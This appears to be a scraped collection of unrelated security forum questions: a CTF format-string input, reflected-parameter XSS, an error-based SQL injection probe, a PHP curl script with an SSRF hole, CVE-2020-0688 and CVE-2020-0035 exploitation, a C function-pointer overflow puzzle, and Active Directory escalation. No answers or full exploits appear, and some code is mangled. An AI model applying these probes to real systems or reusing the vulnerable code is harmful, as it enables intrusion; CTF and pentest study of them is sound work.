How to send a string format exploit through socket

I’m doing a CTF exercise here:

https://c-wars.acnr.se/download/level2.tgz

There is a docker with the vulnerable service, which I need to found the value of a variable. I was able to do it by the following input:

== Login Service 1.0 == Username: %7$  s Password: a Welcome: ACNR{_SERVICE_FLAG_} 

My issue now is that the submission needs to call a function that is going to send this string by a socket, so I guess I need to escape it. I have tried %7$ s, but didnt worked.

Submission format can be found at https://c-wars.acnr.se/download/MANUAL.pdf

#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <stdint.h> #include "gamelib.h" uint32_t main(uint32_t argc, uint8_t ** argv) { svc_init(); svc_set(10000); svc_writeln("gimme flag"); svc_readuntil('}'); return 0; } 

Ways to exploit a form action value when it s reflected from URI on React-Django

I am working on a security testing project, where I have noticed that the form action of a login page takes whatever is fed to URI as a parameter, the respective part of the login page is as follows:

<form action="/admin/login/?param=Whateveryouputhere" method="post" id="login-form"> 

Actually, you can even omit the “param”, any value after the question mark will still be reflected. the default value for te param is “/next/” btw.

How could an attacker exploit it, especially via XSS? I tried to escape the the quotations but it failed (they are auto-replaced with URL-encodings). Does it mean it is safe?

I have also checked the network tab of the browser, no other relative JS files are loaded except favicon and magnific popup.

Finally, the URL is in the form of site.com/admin/login/?param=value

Unable to exploit Sql Injection in the parameter

During my testing I have found a vulnerable parameter in API (/api/v1/documents/?direction=desc&limit=30&mode=reports**&page=1**) and its parameter is page=1 at the end. Upon giving a NULL value &page= in the parameter it returns the following error.

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 30) AS `UserDocuments` LEFT OUTER JOIN `tasks` AS `Tasks` ON `UserDocuments' at line 1" 

While if i input ` at the end of value page=1′ it returns the following error

"Undeclared variable: NaN","sql":"SELECT `UserDocuments`.*, `Tasks`.`id` AS `Tasks.id`, `Tasks`.... 

I have the following questions in my mind , i have tried exploiting it but unable to do so. How can i exploit this parameter as it is returning the syntax error. Also if it is not exploitable is it still vulnerable to Sql Injection or some attack ?

Please Note that it is a GET Request and Response is in JSON, while application is developed on PHP.

Is it possible to exploit php curl?

I have been working on a project and I wonder if its possible to exploit curl_exec function while in php. Scenario: I have the php script that checks a domain for me, but the curl is not secured, can it be exploited via the request, ex: script.php?action=websiteup&token=apikey&target=EVIL CODE HERE , I have googled around but did not find anything that could answer my question, found some theories but nothing helped me.

Script:

case "websiteup":              $  ch = curl_init($  _GET['target']);             curl_setopt_array($  ch, array(                 CURLOPT_RETURNTRANSFER => true,                 CURLOPT_HTTPHEADER     => array(                 ),                 CURLOPT_TIMEOUT        => 15,                 CURLOPT_CUSTOMREQUEST  => "HEAD",                 CURLOPT_REFERER        => $  _GET['target'],                 CURLOPT_USERAGENT      => "Mozilla/5.0 ;Windows NT 6.1; WOW64; AppleWebKit/537.36 ;KHTML, like Gecko; Chrome/39.0.2171.95 Safari/537.36",             ));             curl_exec($  ch);              $  response['message'] = array(                 "code" => curl_getinfo($  ch, CURLINFO_HTTP_CODE),                 "time" => curl_getinfo($  ch, CURLINFO_CONNECT_TIME),             ); 

Any ideas how can it be exploited and secured ?

Exploit CVE-2020-0688 for older versions

I wanted to exploit my IIS CVE-2020-0688, which I saw that the key is the same as advertised.

The problem is that my IIS is old, and uses AppPool of .NET 2 and not .NET 4. Also I can use only GET as I don’t see a POST request using the viewstate. All the exploits in ysoserial use Microsoft.PowerShell.Editor.dll which is not loaded in the old version.

Does anyone know a gadget for .NET2?

How to exploit this C program to call a certain function?

The goal is to call the function foo in the following program:

struct object {     unsigned char buf[36];     void (*fp)(); };  void baz(struct object * obj, unsigned int num) {     for (int i = 0; i < num; i++) {         unsigned int x;         scanf("%d", &x);         if (x == 0) break;         obj->buf[i] = x & 0x000000ff;     } }  void foo() { // target }  void bar() { }  int main() {     setvbuf(stdin,  NULL, _IONBF, 0);      setvbuf(stdout, NULL, _IONBF, 0);      setvbuf(stderr, NULL, _IONBF, 0);      struct object * obj = malloc(sizeof(struct object));     memset(obj->buf, 0, 36);     obj->fp = &bar;      int num;     scanf("%d", &num);     if (num > 36) {         num = 0;     } else {         baz(obj, num);     }      for (int i = 0; i < num; i++) {         printf("%d. \t", i + 1);         for (int j = 0; j < obj->buf[i]; j++) {             printf("*");         }         puts("");     }      obj->fp();     free(obj); } 

My thoughts were to modify fp in obj (which is called at the end) such that it points to foo instead of bar. By entering a negative number for num such that it becomes a large positive number when casted to unsigned int in baz, this should allow the modification of fp by overflowing buf in obj. However, this would require the address of foo which changes every time the program is run.

I would appreciate any ideas or hints to solve this problem.

How to exploit CVE-2020-0035 in android

I have some issues with this CVE. Firstly, I can see that there is some permission issue in TelephonyProvider.java which causes some information disclosure.

I have tried to use frida exploit this CVE, however, I cannot find the TelephonyProvider class.

Next, I tried to create an application but I cannot import android.provider.Telephony.TelephonyProvider class. (I read through the code that Google provides, they manage to import it.

Links: https://source.android.com/security/bulletin/2020-03-01 https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/099c68c403c470aaafd3a0f7d4bdf69c873d4740

how to exploit user which I own according to bloodhound?

During a pentest, I succeeded to compromize a user with low privileges. As this is a domain user, I decided to run BloodHound based on its credentials to check whether there is a path from this user to domain admins.

I have the own privilege on another active directory account, which mean I should be able to change its attributes, such as userPassword, which I did, using ldp.exe. Unfortunately, Active Directory does not seem to allow authentication based on this LDAP attribute. So I needed to find something else.

I would like to use the MMC Active Directory Users and Computers but i need to be logged in as a domain member, which I can’t as I would need to integrate my PC to the domain (I prefer not to do so).

which tool can I use to act/impersonate this user I am supposed to own ?

Many thanks;

Png/JPG exploit

So I recently stumbled on multiple cases suggesting there’s a JPG/PNG exploit which is able to silently execute malicious code when simply viewing the image? Just looking for some insight as to whether this vulnerability requires the user to open the png or just simply ” view ” it.

videos showing POC –

https://www.youtube.com/watch?v=LsJFJkj8uiY ( Discord to distribute ) https://www.youtube.com/watch?v=1x6CLoKySoQ ( Gmail to distribute ) 

In the above videos the malicious code executes from just viewing the image inside your browser, not even downloading and opening locally. I mean if this is the case and I’m interpreting this correctly then surely at this current state the internet is ” gg “, in basic terms don’t open your browser lol?

How do programmers write exploits from CVE with no known metasploit exploit?

Please don’t just tell me to go read “A Bug Hunter’s Diary” book. I’ve noticed that lots of CVE at www.cvedetails.com do not have publicly available exploits. But they have high scores (ex : more that 9 score) With such a high score, I’d thought exploits would be readily available but it’s not the case (not even present in exploitdb).

So how would a hacker basically, from the description at www.cvedetails.com write an exploit code. Do hackers even bother do that ?